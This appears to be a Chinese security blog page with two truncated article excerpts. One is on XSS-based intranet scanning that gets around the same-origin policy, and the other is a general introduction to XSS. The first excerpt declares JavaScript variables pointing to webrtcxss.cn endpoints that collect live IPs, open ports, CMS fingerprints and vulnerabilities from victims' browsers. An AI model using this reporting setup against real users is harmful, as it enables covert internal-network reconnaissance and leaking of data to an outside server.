浏览器插件的攻击向量

0x01 前言:

很多人都认为XSS只能做盗取cookies的活。以至于有些SRC、厂商对待反射型XSS视而不见,或者说是根本不重视。

直到“黑哥”在之前的演讲中提到XSS入侵内网,情况才得以好转。但是经过本人测试,黑哥所说的XSS内网入侵,应该是包含了浏览器漏洞。那没有浏览器漏洞该如何呢?就像0x_Jin之前在乌云报道的搜狐漏洞那样:http://www.wooyun.org/bugs/wooyun-2014-076685

这里有几个需要注意的地方:由于浏览器的同源策略问题导致没有办法做到真正意义上的内网入侵,当然如果你又浏览器的0day,那事情就另当别论了。

而0x_Jin在乌云中的那篇漏洞报告,我自己本人也去问了。答复就是只是检测了开放的80端口,就没有后续了。黑哥没有公布完整的代码,0x_Jin没有深入。既然都没有,就交给我吧。这里我将会使用其他办法“绕过浏览器的同源策略”。

0x02构架:

代码采用了类似XSS平台那种实时反馈机制。在这里我先把变量介绍一遍:

1
2
3
4
5
6
7
8
var onlyString           = "abc";
var ipList = [];
var survivalIpLIst = [];
var deathIpLIst = [];
var sendsurvivalIp = "http://webrtcxss.cn/Api/survivalIp";
var snedIteratesIpUrl = "http://webrtcxss.cn/Api/survivalPortIp";
var snedIteratesCmsIpUrl = "http://webrtcxss.cn/Api/survivalCmsIp";
var sendExistenceVul = "http://webrtcxss.cn/Api/existenceVul";

XSS的原理分析与解剖

0×01 前言:

《xss攻击手法》一开始在互联网上资料并不多(都是现成的代码,没有从基础的开始),直到刺的《白帽子讲WEB安全》和cn4rry的《XSS跨站脚本攻击剖析与防御》才开始好转。

我这里就不说什么xss的历史什么东西了,xss是一门又热门又不太受重视的Web攻击手法,为什么会这样呢,原因有下:

  1. 耗时间
  2. 有一定几率不成功
  3. 没有相应的软件来完成自动化攻击
  4. 前期需要基本的html、js功底,后期需要扎实的html、js、actionscript2/3.0等语言的功底
  5. 是一种被动的攻击手法
  6. 对website有http-only、crossdomian.xml没有用
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×